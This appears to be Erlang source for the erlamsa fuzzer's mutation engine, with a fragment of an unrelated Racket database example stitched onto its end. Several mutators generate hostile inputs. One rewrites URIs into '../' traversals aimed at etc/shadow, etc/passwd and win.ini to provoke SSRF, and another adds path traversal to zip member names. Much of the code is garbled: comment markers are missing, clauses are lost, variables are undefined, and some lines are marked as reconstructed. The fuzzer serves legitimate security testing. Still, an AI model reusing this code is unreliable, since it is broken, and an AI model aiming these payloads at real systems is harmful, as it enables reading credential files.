NewQuery = Traversals ++ case erlamsa_rnd:erand(4) of
1 -> string:join(Query, "/");
2 -> "Windows/win.ini";
3 -> "etc/shadow";
4 -> "etc/passwd"
end,
{lists:reverse(Acc) ++ "://" ++ Domain ++ lists:flatten(NewQuery), 1, {uri, success}}.
-spec try_uri_mutate(list()) -> {list(), integer(), list()}.
try_uri_mutate(Lst) -> try_uri_mutate(Lst, []).
-spec try_uri_mutate(list(), list()) -> {list(), integer(), list()}.
try_uri_mutate([ $:, $/, $/ | T], Acc) ->
rand_uri_mutate(T, Acc, erlamsa_rnd:erand(3));
try_uri_mutate([], Acc) -> {lists:reverse(Acc), 0, []};
try_uri_mutate([H|T], Acc) ->
try_uri_mutate(T, [H|Acc]).
-spec uri_mutator(list_of_bins(), meta_list()) -> mutation_res().
uri_mutator([H|T], Meta) ->
Cs = erlamsa_strlex:lex(binary_to_list(H)),
{Ms, {NewD, NewMeta}} = lists:mapfoldl(
fun
({text, A}, {DAcc, MAcc}) when length(A) > 5 ->
{NewA, NewD, NewMeta} = try_uri_mutate(A),
{{text, NewA}, {DAcc + NewD, [NewMeta | MAcc]}};
(Lex, Acc) -> {Lex, Acc}
end,
{-1, Meta}, Cs),
BinData = list_to_binary(erlamsa_strlex:unlex(Ms)),
{fun base64_mutator/2, [BinData | T], NewMeta, NewD}.
-spec usual_delims(non_neg_integer()) -> non_neg_integer() | false.
usual_delims(_) -> false.
-spec grow(list(), byte(), list()) -> {list(), list() | false}.
- > lst # false = ran out of data trying to parse up to close , but lst is the same with partial parsing
- > lst tail - lst = did successfully parse up to close . ready node is lst , tail is following data
{lists:reverse(Rout), false};
{lists:reverse([Close | Rout]), T};
grow([H|T], Close, Rout) ->
Next_close = usual_delims(H),
case Next_close of
add one byte to this node
grow(T, Close, [H | Rout]);
_Else ->
{This, Lst} = grow(T, Next_close, []),
Lst =:= false ->
{lists:reverse(Rout) ++ [H | This], false};
true ->
grow(Lst, Close, [[H | This] | Rout])
end
end.
count_nodes(T , count_nodes(H , N+1 ) ) ;
-spec sublists(list()) -> list().
%% Collect every list node found anywhere inside Lst when walked
%% recursively, not counting Lst itself and not counting tails.
sublists(Lst) -> sublists(Lst, []).

-spec sublists(list(), list()) -> list().
sublists(Lst, Acc0) ->
    lists:foldl(
      fun (El, Acc) when is_list(El) -> sublists(El, [El | Acc]);
          (_El, Acc) -> Acc
      end, Acc0, Lst).
-spec pick_sublist(list()) -> list().
%% Pick a random sub-list of Lst, or false when it contains none.
pick_sublist(Lst) ->
    case sublists(Lst) of
        [] -> false;
        Subs -> erlamsa_rnd:rand_elem(Subs)
    end.
-spec edit_sublist(list(), list(), fun()) -> list().
%% Apply Op to the first cell whose head equals Sub, i.e. replace the
%% (Sub . Tail) cell with Op([Sub | Tail]). Note: non-list leaves get
%% wrapped into singleton lists along the way, so the result is an
%% iolist-shaped tree rather than a structurally identical list --
%% callers flatten it with erlang:iolist_to_binary/1.
edit_sublist(Lst, Sub, Op) ->
    lists:reverse(edit_sublist(Lst, Sub, Op, [])).

-spec edit_sublist(list(), list(), fun(), list()) -> list().
%% Head of the current cell is the target: apply Op to the whole cell
%% (the tail is carried inside it) and stop scanning this list.
edit_sublist(Lst = [H|_T], Sub, Op, Acc) when H =:= Sub ->
    [Op(Lst)|Acc];
%% Otherwise recurse into the head and continue along the tail.
edit_sublist([H|T], Sub, Op, Acc) ->
    NewH = edit_sublist(H, Sub, Op),
    edit_sublist(T, Sub, Op, [NewH|Acc]);
%% Leaf (non-list or end of list): keep it as-is.
edit_sublist(Lst, _Sub, _Op, Acc) ->
    [Lst|Acc].
-spec edit_sublists(list(), gb_trees:tree()) -> list().
lst ( ff of node - > ( node - > node ) ) - > lst ' ; < - could also be done with a recursive - mapn
edit_sublists([Hd|T], OpFF) when is_list(Hd) ->
MaybeOp = erlamsa_utils:get(Hd, false, OpFF),
case MaybeOp of
false ->
[edit_sublists(Hd, OpFF) | edit_sublists(T, OpFF)];
_ ->
[MaybeOp(Hd) | edit_sublists(T, OpFF)]
end;
edit_sublists([H|T], OpFF) ->
[H | edit_sublists(T, OpFF)];
edit_sublists(Lst, _) -> Lst.
-spec partial_parse(list()) -> list().
partial_parse(Lst) -> partial_parse(Lst, []).
-spec partial_parse(list(), list()) -> list().
partial_parse([], Rout) ->
lists:reverse(Rout);
partial_parse([H|T], Rout) ->
CloseP = usual_delims(H),
case CloseP of
false ->
partial_parse(T, [H | Rout]);
_ ->
{This, Lst} = grow(T, CloseP, []),
case Lst of
false ->
lists:reverse(Rout) ++ [H|This];
_ ->
partial_parse(Lst, [[H|This] | Rout])
end
end.
-spec sed_tree_op(fun(), atom()) -> mutation_fun().
sed_tree_op(Op, Name) ->
fun F (Ll = [H|T], Meta) ->
case erlamsa_utils:binarish(H) of
true -> {F, Ll, Meta, -1};
false ->
NewMeta = [{Name, 1} | Meta],
Lst = partial_parse(binary_to_list(H)),
NewLst = edit_sublist(Lst, Sub, Op),
{F, [erlang:iolist_to_binary(NewLst) | T], NewMeta, 1}
end
end.
-spec sed_tree_dup() -> mutation_fun().
sed_tree_dup() ->
sed_tree_op(fun (Node = [H|_T]) -> [H|Node] end, tree_dup).
-spec sed_tree_del() -> mutation_fun().
sed_tree_del() ->
sed_tree_op(fun ([_H|T]) -> T end, tree_del).
-spec sed_tree_swap_one(list(), list()) -> list().
overwrite one node with one of the others
sed_tree_swap_one(Lst, Subs) ->
ToSwap = erlamsa_rnd:reservoir_sample(Subs, 2),
[A | [B | _]] = erlamsa_rnd:random_permutation(ToSwap),
edit_sublist(Lst, A, fun ([_|Tl]) -> [B | Tl] end).
-spec sed_tree_swap_two(list(), list()) -> list().
pairwise swap of two nodes
TODO : here there is a bug ( also in original radamsa ) that causes to swap child with the parent node , could be feature xD
sed_tree_swap_two(Lst, Subs) ->
ToSwap = erlamsa_rnd:reservoir_sample(Subs, 2),
[A | [B | _]] = ToSwap,
Mapping = gb_trees:enter(B, fun(_X) -> A end, gb_trees:enter(A, fun (_X) -> B end, gb_trees:empty())),
edit_sublists(Lst, Mapping).
-spec construct_sed_tree_swap(fun(), atom()) -> mutation_fun().
construct_sed_tree_swap(Op, Name) ->
fun F (Ll = [H|T], Meta) ->
case erlamsa_utils:binarish(H) of
true -> {F, Ll, Meta, -1};
false ->
Lst = partial_parse(binary_to_list(H)),
Subs = sublists(Lst),
N = length(Subs),
case N < 2 of
true -> {F, Ll, Meta, -1};
false ->
NewLst = Op(Lst, Subs),
{F, [erlang:iolist_to_binary(NewLst) | T], [{Name, 1} | Meta], 1}
end
end
end.
-spec repeat_path(list(), list(), non_neg_integer()) -> list().
repeat_path(Parent, _Child, N) when N < 2 ->
< - causes at least 1 extra path to be made , saves one useless replace cycle
repeat_path(Parent, Child, N) ->
case erlang:process_info(self(), memory) of
{memory, Mem} when Mem > 256000000 ->
Parent;
_Else ->
edit_sublist(Parent, Child,
fun ([_H|T]) -> [repeat_path(Parent, Child, N-1) | T] end)
end.
-spec choose_child(list()) -> false | list().
choose_child(Node) ->
Subs = sublists(Node),
case Subs of
[] -> false;
_Else -> erlamsa_rnd:rand_elem(Subs)
end.
-spec choose_stutr_nodes(list()) -> {false | list(), false | list()}.
choose_stutr_nodes([H|T]) ->
Childp = choose_child(H),
case Childp of
false -> choose_stutr_nodes(T);
_Else -> {H, Childp}
end.
-spec sed_tree_stutter(list_of_bins(), meta_list()) -> mutation_res().
sed_tree_stutter(Ll = [H|T], Meta) ->
case erlamsa_utils:binarish(H) of
true -> {fun sed_tree_stutter/2, Ll, Meta, -1};
false ->
Subs = sublists(Lst),
RandSubs = erlamsa_rnd:random_permutation(Subs),
{Parent, Child} = choose_stutr_nodes(RandSubs),
N_reps = erlamsa_rnd:rand_log(10),
case Parent of
false -> {fun sed_tree_stutter/2, Ll, Meta, -1};
_Else ->
NewLst = edit_sublist(Lst, Child,
fun ([_H|Tl]) -> [repeat_path(Parent, Child, N_reps)|Tl] end),
{fun sed_tree_stutter/2,
[erlang:iolist_to_binary(NewLst) | T],
[{tree_stutter, 1} | Meta], 1}
end
end.
%% UTF-8
%% grab low 6 bits of a number
-spec ext(integer()) -> integer().
%% Turn N's low six bits into a UTF-8 continuation byte (10xxxxxx).
ext(N) ->
    2#10000000 bor (N band 2#111111).
-spec encode_point(integer()) -> [integer()].
encode an ascii to utf-8
ascii , fits 7 bits
[Point];
5 + 6 bits
[16#c0 bor (16#1f band (Point bsr 6)),
ext(Point)];
4 + 2 * 6 bits
[16#e0 bor (16#0f band (Point bsr 12)),
ext(Point bsr 6),
ext(Point)];
3 + 3 * 6 bits
[16#f0 bor (2#111 band (Point bsr 18)),
ext(Point bsr 12),
ext(Point bsr 6),
ext(Point)].
-spec funny_unicode() -> list().
funny_unicode() ->
65535
65536
utf16
[43,47,118,57],[43,47,118,43],[43,47,118,47],
[247,100,76],[221,115,102,115],[14,254,255],[251,238,40],
[251,238,40,255],[132,49,149,51]],
Codes = [[16#0009,16#000d],16#008D, 16#00a0,16#1680,16#180e,
[16#2000,16#200a],16#2028,16#2029,16#202f,16#205f,
16#3000,[16#200e,16#200f],[16#202a,16#202e],
[16#200c,16#200d],16#0345,16#00b7,[16#02d0,16#02d1],
16#ff70,[16#02b0,16#02b8],16#fdd0,16#034f,
[16#115f,16#1160],[16#2065,16#2069],16#3164,16#ffa0,
16#e0001,[16#e0020,16#e007f],
[16#0e40,16#0e44],16#1f4a9],
Numbers = lists:foldl(
fun
([X,Y], Acc) -> lists:seq(X,Y) ++ Acc;
(X, Acc) -> [X|Acc]
end, [], Codes),
Manual ++ [encode_point(X) || X <- Numbers].
-spec sed_utf8_widen(list_of_bins(), meta_list()) -> mutation_res().
%% Widen one random ASCII byte into an overlong two-byte UTF-8 sequence
%% (only bytes that fit in six bits are widened; others are left alone).
sed_utf8_widen([H|T], Meta) ->
    Pos = erlamsa_rnd:rand(size(H)),
    Delta = erlamsa_rnd:rand_delta(),
    Widen = fun (B) when B band 2#111111 =:= B ->
                    Cont = 2#10000000 bor B,
                    <<2#11000000:8, Cont:8>>;
                (B) ->
                    <<B:8>>
            end,
    {fun sed_utf8_widen/2,
     [edit_byte_vector(H, Pos, Widen) | T],
     [{sed_utf8_widen, Delta} | Meta], Delta}.
-spec sed_utf8_insert(list_of_bins(), meta_list()) -> mutation_res().
%% Insert a randomly chosen "funny unicode" byte sequence directly after a
%% random byte of the head binary.
sed_utf8_insert([H|T], Meta) ->
    Pos = erlamsa_rnd:rand(size(H)),
    Delta = erlamsa_rnd:rand_delta(),
    Payload = list_to_binary(erlamsa_rnd:rand_elem(funny_unicode())),
    Inject = fun (B) -> <<B:8, Payload/binary>> end,
    {fun sed_utf8_insert/2,
     [edit_byte_vector(H, Pos, Inject) | T],
     [{sed_utf8_insert, Delta} | Meta], Delta}.
-spec nomutation(list_of_bins(), meta_list()) -> mutation_res().
%% Identity mutator (debugging aid): returns the input unchanged, tags the
%% metadata with {nomutation, -1} and reports delta -1.
nomutation(Ll, Meta) ->
    {fun nomutation/2, Ll, [{nomutation, -1}|Meta], -1}.
%% Mutate a predicted length field inside Binary.
%% First clause: no length-field candidate was detected — return the binary
%% untouched with delta -2.
mutate_length(Binary, []) -> {-2, Binary};
%% Second clause: Elem describes a candidate length field of Size bits at
%% byte offset A, prefixing a Len-byte blob.
mutate_length(Binary, _Elem = {ok, Size, Endianness, Len, A, _B}) ->
    Am8 = A * 8, Len8 = Len * 8,
    %% Split Binary into header H, the length-prefixed Blob and the Rest;
    %% the repeated Len in the pattern re-asserts the predicted length.
    {H, Len, Blob, Rest} = erlamsa_field_predict:extract_blob(Endianness, Binary, Am8, Size, Len8),
    <<TmpNewLen:Size>> = erlamsa_rnd:random_block(trunc(Size/8)),
    NewLen = min(?ABSMAX_BINARY_BLOCK, TmpNewLen*2),
    Result =
    case erlamsa_rnd:rand(7) of
        %% set len field = 0
        0 -> <<H:Am8, 0:Size, Blob:Len8, Rest/binary>>;
        %% set len field = 0xFF .. FF
        1 -> <<H:Am8, -1:Size, Blob:Len8, Rest/binary>>;
        %% replace the blob with a random block of the new length
        2 ->
            RndBlock = erlamsa_rnd:fast_pseudorandom_block(NewLen),
            TmpBin = erlamsa_field_predict:rebuild_blob(Endianness, H, Am8, Len, Size, Blob, Len8, RndBlock),
            <<TmpBin/binary, Rest/binary>>;
        %% rebuild with NewLen recorded but an empty blob
        3 ->
            erlamsa_field_predict:rebuild_blob(Endianness, H, Am8, NewLen, Size, 0, 0, Rest);
        %% default: keep the blob but record NewLen as its length
        _Else ->
            erlamsa_field_predict:rebuild_blob(Endianness, H, Am8, NewLen, Size, Blob, Len8, Rest)
    end,
    {+1, Result}.
-spec length_predict(list_of_bins(), meta_list()) -> mutation_res().
%% Pick one of the candidate length-field descriptions detected in the head
%% binary and let mutate_length/2 act on it (mutate_length treats [] as "no
%% candidate" and leaves the data untouched).
length_predict([H|T], Meta) ->
    Elem = erlamsa_rnd:rand_elem(erlamsa_field_predict:get_possible_simple_lens(H)),
    {D, Bin} = mutate_length(H, Elem),
    {fun length_predict/2, [Bin|T], [{muta_len, D}|Meta], D}.
%% zip:foldl/3 callback: prefix the archive member's name with a random
%% number (0..19) of "../" segments and collect {Name, Binary, Info} specs.
%% The binary accessor is forced before the info accessor, as before.
mutate_zip_path(FileName, GetInfo, GetBin, Acc) ->
    Depth = erlamsa_rnd:rand(20),
    Traversal = lists:duplicate(Depth, "../"),
    NewFileName = lists:flatten([Traversal, FileName]),
    [{NewFileName, GetBin(), GetInfo()} | Acc].
-spec zip_path_traversal(list_of_bins(), meta_list()) -> mutation_res().
%% Treat the head binary as a ZIP archive and rewrite every member name with
%% random "../" prefixes (path-traversal fuzzing), rebuilding the archive in
%% memory. If the data is not a valid archive (or zip:foldl fails for any
%% reason) the input is returned unchanged with delta -1.
zip_path_traversal([H|T], Meta) ->
    Name = "inmemory.zip",
    case zip:foldl(fun mutate_zip_path/4, [], {Name, H}) of
        {ok, FileSpec} ->
            %% FileSpec was accumulated by prepending, hence the reverse.
            {ok, {Name, Bin}} = zip:create(Name, lists:reverse(FileSpec), [memory]),
            {fun zip_path_traversal/2, [Bin|T], [{muta_zippath, +1}|Meta], +1};
        _Else ->
            {fun zip_path_traversal/2, [H|T], [{muta_zippath, -1}|Meta], -1}
    end.
%% Basic type mutations (for fuzzing record-related data, e.g. protobuf, ASN.1, etc.)
-spec basic_mutate_binary(binary()) -> binary().
%% Apply one randomly chosen "inner" mutation to a standalone binary by
%% building a one-shot muxed mutator over the default inner-mutation set and
%% running it with empty metadata.
basic_mutate_binary(Binary) ->
    Muta = erlamsa_mutations:mutators_mutator(erlamsa_mutations:inner_mutations(default)),
    {_NewMuta, NewLstBin, _Meta} = Muta([Binary], []),
    hd(NewLstBin).
-spec basic_mutate_list(list()) -> list().
%% Entry point for generic list mutation: pick one of the list strategies at
%% random. NOTE(review): the exact range of erlamsa_rnd:rand(12) (inclusive
%% or exclusive) is assumed from the 0..12 spec of the /2 variant — confirm.
basic_mutate_list(Lst) -> basic_mutate_list(Lst, erlamsa_rnd:rand(12)).
-spec basic_mutate_list(list(), 0..12) -> list().
erlamsa_rnd:random_permutation(Lst);
erlamsa_generic:list_del(Lst, length(Lst));
erlamsa_generic:list_del_seq(Lst, length(Lst));
swap two elements
erlamsa_generic:list_dup(Lst, length(Lst));
swap two elements
erlamsa_generic:list_repeat(Lst, length(Lst));
swap two elements
erlamsa_generic:list_clone(Lst, length(Lst));
swap two elements
erlamsa_generic:list_swap(Lst, length(Lst));
basic_mutate_list([], _) -> [];
R = erlamsa_rnd:erand(length(Lst)),
erlamsa_utils:applynth(R, Lst, fun basic_type_mutation/1).
-spec basic_mutate_string(list()) -> list().
%% Mutate a character list. Mostly-printable-ASCII strings (>= 80% of the
%% characters in 32..126) are round-tripped through binary mutation; anything
%% else falls back to generic list mutation.
%% The empty-string clause avoids the badarith (division by zero) that the
%% ratio test `Asciis / L` would otherwise hit, since length("") =:= 0;
%% returning [] matches basic_mutate_list's own empty-list behaviour.
basic_mutate_string([]) -> [];
basic_mutate_string(Str) ->
    L = length(Str),
    Asciis = lists:foldl(fun (A, Acc) when A>31,A<127 -> Acc+1; (_,Acc) -> Acc end, 0, Str),
    if
        Asciis / L >= 0.8 -> binary_to_list(basic_mutate_binary(list_to_binary(Str)));
        true -> basic_mutate_list(Str)
    end.
-spec basic_type_mutation(any(), float()) -> any().
%% Mutate El with probability Prob, drawing a fresh uniform float here.
basic_type_mutation(El, Prob) -> basic_type_mutation(El, erlamsa_rnd:rand_float(), Prob).
-spec basic_type_mutation(any(), float(), float()) -> any().
%% Rnd >= Prob: keep the value untouched; otherwise dispatch on its type.
basic_type_mutation(El, Rnd, Prob) when Rnd >= Prob -> El;
basic_type_mutation(El, _Rnd, _Prob) -> basic_type_mutation(El).
-spec basic_type_mutation(any()) -> any().
%% Type-directed mutation of a single term: booleans are flipped, a list
%% whose head is not an integer is treated as a generic list, any other list
%% as a string, binaries/integers/floats get their own mutators, and terms
%% of any other type are returned unchanged.
basic_type_mutation(true) -> false;
basic_type_mutation(false) -> true;
%% `is_integer(H) =/= true` is a guard-safe spelling of `not is_integer(H)`.
basic_type_mutation(El = [H|_]) when is_list(El), is_integer(H) =/= true -> basic_mutate_list(El);
basic_type_mutation(El) when is_list(El) -> basic_mutate_string(El);
basic_type_mutation(El) when is_binary(El) -> basic_mutate_binary(El);
basic_type_mutation(El) when is_integer(El) -> mutate_num(El);
basic_type_mutation(El) when is_float(El) -> mutate_float(El);
basic_type_mutation(El) -> El.
-spec adjust_priority(non_neg_integer(), non_neg_integer()) -> non_neg_integer().
%% Shift a mutator's score by Delta, clamped to [?MIN_SCORE, ?MAX_SCORE].
%% A zero delta is a no-op (and skips the clamp entirely).
adjust_priority(Pri, 0) -> Pri;
adjust_priority(Pri, Delta) ->
    Shifted = Pri + Delta,
    max(?MIN_SCORE, min(?MAX_SCORE, Shifted)).
-spec weighted_permutations([mutation()]) -> [mutation()].
%% Order the mutation list by a random draw weighted by score * priority:
%% each entry gets a random key in [0, Score*Pri), the list is sorted by
%% that key in descending order, and the keys are then discarded.
weighted_permutations([]) -> [];
weighted_permutations(Pris) ->
    Draw = fun (Muta = {Score, Pri, _, _}) ->
                   {erlamsa_rnd:rand(trunc(Score * Pri)), Muta}
           end,
    Drawn = lists:map(Draw, Pris),
    Descending = fun ({A, _}, {B, _}) -> A >= B end,
    [Muta || {_, Muta} <- lists:sort(Descending, Drawn)].
%% Mutators have a score they can change themselves (1-100) and a priority given by
%% the user (comment marker restored; the sentence's continuation was lost).
-spec mux_fuzzers([mutation()]) -> fun().
%% ([#(score priority name) ...]) -> merged-mutafn :: rs ll meta -> merged-mutafn' rs' ll' meta'
%% Merge a list of mutators into a single mutator fun: on each call the
%% mutators are re-permuted by weight and tried in order.
mux_fuzzers(Fs) ->
    fun
        L([], Meta) -> {mux_fuzzers(Fs), <<>>, Meta};
        L(Ll, Meta) when is_list(Ll) ->
            mux_fuzzers_loop(Ll, weighted_permutations(Fs), [], Meta)
        %% NOTE(review): the extracted source had a stray ';' after this
        %% clause, suggesting a third clause (probably forcing a lazy list,
        %% e.g. `L(Ll, Meta) -> L(Ll(), Meta)`) was lost — confirm against
        %% upstream erlamsa before feeding non-list inputs to this fun.
    end.
-spec mux_fuzzers_loop(lazy_list_of_bins(), [mutation()], [mutation()], meta_list()) -> {fun(), lazy_list_of_bins(), meta_list()}.
%% Try the weighted mutator permutation in order until one actually changes
%% the data, rebuilding the merged mutator from the re-scored entries.
mux_fuzzers_loop(Ll, [], Out, Meta) -> {mux_fuzzers(Out), Ll, Meta};
%% Head binary too large to mutate: give up for this round, recording the skip.
mux_fuzzers_loop(Ll = [H|_T], [_Node|Tail], Out, Meta) when is_binary(H), byte_size(H) > ?ABSMAX_BINARY_BLOCK ->
    {mux_fuzzers(Out ++ Tail), Ll, [{skipped_big, byte_size(H)} | Meta]};
mux_fuzzers_loop(Ll, [Node|Tail], Out, Meta) ->
    {Mscore, MPri, Fn, Mname} = Node,
    Res = Fn(Ll, Meta),
    %% in radamsa (mfn rs mll mmeta delta) = Fn(...), that strange, TODO: check it
    %% in radamsa mfn instead of fn
    %% NOTE(review): the two bindings below were reconstructed — the original
    %% lines (which carried the two comments above as trailing comments) were
    %% lost in extraction. They unpack the mutation result and re-score the
    %% mutator with its reported delta; Mscore/MPri/adjust_priority being
    %% otherwise unused corroborates this shape, but confirm upstream.
    {MFn, Mll, MMeta, Delta} = Res,
    NOut = [{adjust_priority(Mscore, Delta), MPri, MFn, Mname} | Out],
    IsMll = is_list(Mll),
    if
        %% Head unchanged: count a failure and try the next mutator.
        IsMll andalso (hd(Mll) == hd(Ll)) -> mux_fuzzers_loop(Ll, Tail, NOut, [{failed, Mname} | MMeta]);
        true -> {mux_fuzzers(NOut ++ Tail), Mll, [{used, Mname} | MMeta]}
    end.
-spec mutations() -> [mutation()].
%% Full mutation table with no user-supplied custom mutations.
mutations() ->
    mutations([]).
-spec mutations([mutation()]) -> [mutation()].
%% Master table of all available mutations. Each entry is
%% {MaxScore, DefaultPriority, MutationFun, ShortName, Description};
%% the 5-tuples are narrowed to 4-tuples (dropping the description) by
%% mutas_list/1, inner_mutations/1 and make_mutator/2 before use.
%% User-supplied CustomMutas are appended verbatim.
mutations(CustomMutas) ->
    [{?MAX_SCORE, 10, fun erlamsa_sgml:sgml_mutate/2, sgm, "SGML tree mutations"},
     {?MAX_SCORE, 3, fun erlamsa_json:json_mutate/2, js, "JSON tree mutations"},
     {?MAX_SCORE, 1, fun sed_utf8_widen/2, uw, "try to make a code point too wide"},
     {?MAX_SCORE, 2, fun sed_utf8_insert/2, ui, "insert funny unicode"},
     {?MAX_SCORE, 1, construct_ascii_bad_mutator(), ab, "enhance silly issues in ASCII string data handling"},
     {?MAX_SCORE, 1, construct_ascii_delimeter_mutator(), ad, "play with delimeters in ASCII string data"},
     {?MAX_SCORE, 1, sed_tree_dup(), tr2, "duplicate a node"},
     {?MAX_SCORE, 1, sed_tree_del(), td, "delete a node"},
     {?MAX_SCORE, 3, fun sed_num/2, num, "try to modify a textual number"},
     {?MAX_SCORE, 2, construct_sed_tree_swap(fun sed_tree_swap_one/2, tree_swap_one), ts1, "swap one node with another one"},
     {?MAX_SCORE, 2, fun sed_tree_stutter/2, tr, "repeat a path of the parse tree"},
     {?MAX_SCORE, 2, construct_sed_tree_swap(fun sed_tree_swap_two/2, tree_swap_two), ts2, "swap two nodes pairwise"},
     {?MAX_SCORE, 1, construct_sed_byte_drop(), bd, "drop a byte"},
     {?MAX_SCORE, 1, construct_sed_byte_inc(), bei, "increment a byte by one"},
     {?MAX_SCORE, 1, construct_sed_byte_dec(), bed, "decrement a byte by one"},
     {?MAX_SCORE, 1, construct_sed_byte_flip(), bf, "flip one bit"},
     {?MAX_SCORE, 1, construct_sed_byte_insert(), bi, "insert a byte"},
     {?MAX_SCORE, 1, construct_sed_byte_random(), ber, "swap a byte with random one"},
     {?MAX_SCORE, 1, construct_sed_byte_repeat(), br, "repeat a byte"},
     {?MAX_SCORE, 1, construct_sed_bytes_perm(), sp, "permute a sequence of bytes"},
     {?MAX_SCORE, 1, construct_sed_bytes_repeat(), sr, "repeat a sequence of bytes"},
     {?MAX_SCORE, 1, construct_sed_bytes_drop(), sd, "delete a sequence of bytes"},
     {?MAX_SCORE, 1, construct_sed_bytes_randmask([fun mask_nand/1, fun mask_or/1, fun mask_xor/1]), snand, "NAND/OR/XOR random bytes from block with 2^random values"},
     {?MAX_SCORE, 1, construct_sed_bytes_randmask([fun mask_replace/1]), srnd, "replace random bytes from block with random values"},
     {?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_del/2, line_del), ld, "delete a line"},
     {?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_del_seq/2, line_del_seq), lds, "delete many lines"},
     {?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_dup/2, line_dup), lr2, "duplicate a line"},
     {?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_clone/2, line_clone), lri, "copy a line closeby"},
     {?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_repeat/2, line_repeat), lr, "repeat a line"},
     {?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_swap/2, line_swap), ls, "swap two lines"},
     {?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_perm/2, line_perm), lp, "swap order of lines"},
     {?MAX_SCORE, 1, construct_st_line_muta(fun erlamsa_generic:st_list_ins/2, list_ins, [0]), lis, "insert a line from elsewhere"},
     {?MAX_SCORE, 1, construct_st_line_muta(fun erlamsa_generic:st_list_replace/2, list_replace, [0]), lrs, "replace a line with one from elsewhere"},
     {?MAX_SCORE, 2, fun sed_fuse_this/2, ft, "jump to a similar position in block"},
     {?MAX_SCORE, 1, fun sed_fuse_next/2, fn, "likely clone data between similar positions"},
     {?MAX_SCORE, 2, fun sed_fuse_old/2, fo, "fuse previously seen data elsewhere"},
     {?MAX_SCORE, 2, fun length_predict/2, len, "predicted length mutation"},
     {?MAX_SCORE, 7, fun base64_mutator/2, b64, "try mutate base64-encoded block"},
     {?MAX_SCORE, 1, fun uri_mutator/2, uri, "try mutate URI to cause SSRF"},
     {?MAX_SCORE, 1, fun zip_path_traversal/2, zip, "ZIP path traversal"},
     {?MAX_SCORE, 0, fun nomutation/2, nil, "no mutation will occur (debugging purposes)"}
    |CustomMutas].
%% {Max_Score, Pri, F, Name, Desc} -> {Max_Score, Pri, F, Name}
-spec mutas_list(list()) -> [mutation()].
%% Narrow each 5-tuple mutation entry to the 4-tuple form used at runtime
%% by dropping the human-readable description.
mutas_list(Lst) ->
    Strip = fun ({Score, Pri, F, Name, _Desc}) -> {Score, Pri, F, Name} end,
    lists:map(Strip, Lst).
-spec inner_mutations_list(atom()) -> [atom()].
%% Short names of the mutations allowed when mutating *inside* a structured
%% payload of the given kind (SGML, JSON, or anything else).
%% NOTE(review): `json` in the sgml clause matches no short name in
%% mutations/1 (JSON is registered as `js`), and `sxor` in the default
%% clause matches nothing either (only snand/srnd exist) — both are
%% silently dropped by inner_mutations/1. Probable typos; confirm against
%% upstream before changing.
inner_mutations_list(sgml) -> [ab, ad, bd, b64, ld, lp, lri, lr, num, sd, uri, json];
inner_mutations_list(json) -> [ab, ad, b64, num, sd, sp, sr, uri, sgm];
inner_mutations_list(_) -> [ab, ad, ber, b64, ld, lp, lri, lr, num, sd, srnd, sxor, uri, zip].
-spec inner_mutations(atom()) -> [mutation()].
%% Select, from the full mutation table, only the mutations whose short name
%% is allowed for the given payload kind, narrowing each entry to the
%% runtime 4-tuple form. The fold preserves the original (reversed) order.
inner_mutations(Case) ->
    Wanted = maps:from_list([{Name, ok} || Name <- inner_mutations_list(Case)]),
    Keep =
        fun ({Sc, Pri, Fun, Name, _Desc}, Acc) ->
                case maps:is_key(Name, Wanted) of
                    true -> [{Sc, Pri, Fun, Name} | Acc];
                    false -> Acc
                end
        end,
    lists:foldl(Keep, [], mutations([])).
-spec default(list()) -> [{atom(), non_neg_integer()}].
%% Default mutation selection: every known mutation (plus CustomMutas)
%% paired with its default priority, as consumed by make_mutator/2.
default(CustomMutas) -> [{Name, Pri} || {_, Pri, _, Name, _Desc} <- mutations(CustomMutas)].
-spec tostring(list()) -> string().
%% Render a mutation table as a CLI-style "name,name=Pri,..." string; a
%% priority of 1 is implicit and omitted.
%% Note: because this folds left while prepending, the output is in reverse
%% input order and always carries a trailing comma (e.g. "b=2,a," for
%% [a, b]) — presumably tolerated by the option parser; confirm before
%% changing either property.
tostring(Lst) ->
    lists:foldl(fun ({_, Pri, _, Name, _Desc}, Acc) ->
                    case Pri of
                        1 -> atom_to_list(Name) ++ "," ++ Acc;
                        _Else -> atom_to_list(Name) ++ "=" ++ integer_to_list(Pri) ++ "," ++ Acc
                    end
                end, [], Lst).
-spec make_mutator([{atom(), non_neg_integer()}], list()) -> fun().
%% Build a muxed mutator from a user selection: Lst maps short names to the
%% priorities the user chose; mutations absent from the selection are
%% dropped, the rest are narrowed to 4-tuples with the user's priority and
%% handed to mutators_mutator/1.
make_mutator(Lst, CustomMutas) ->
    Selected = maps:from_list(Lst),
    Pick =
        fun ({Score, _Pri, F, Name, _Desc}, Acc) ->
                case maps:find(Name, Selected) of
                    {ok, UserPri} -> [{Score, UserPri, F, Name} | Acc];
                    error -> Acc
                end
        end,
    mutators_mutator(lists:foldl(Pick, [], mutations(CustomMutas))).
-spec mutators_mutator([mutation()]) -> fun().
%% Build a muxed mutator from a 4-tuple mutation list, randomizing the
%% initial scores.
mutators_mutator(Mutas) ->
    mutators_mutator(Mutas, []).
-spec mutators_mutator([mutation()], [mutation()]) -> fun().
%% Replace each mutation's score with a fresh random value, floored at 2 by
%% max/2, then hand the accumulated list to mux_fuzzers/1.
%% NOTE(review): the exact range of erlamsa_rnd:rand/1 (inclusive or
%% exclusive of ?MAX_SCORE) is assumed — confirm.
mutators_mutator([], Out) ->
    mux_fuzzers(Out);
mutators_mutator([{_, Pri, F, Name}|T], Out) ->
    N = erlamsa_rnd:rand(trunc(?MAX_SCORE)),
    mutators_mutator(T, [{max(2, N), Pri, F, Name} | Out]).
|
688b45e0dee86e0ab36212696beae4b1c2242539767c801efbb4118066117a2e | Bogdanp/deta | books.rkt | #lang racket/base
(require db
deta
threading)
;; Persistent `book` entity: an auto-incrementing integer id plus title,
;; author, and an optional (nullable) publication year.
(define-schema book
  ([id id/f #:primary-key #:auto-increment]
   [title string/f]
   [author string/f]
   [year-published integer/f #:nullable]))
;; In-memory SQLite connection used for this example.
(define conn
  (sqlite3-connect #:database 'memory))

;; Create the table and seed it with four novels; the results of the DDL and
;; insert calls are discarded.
(void
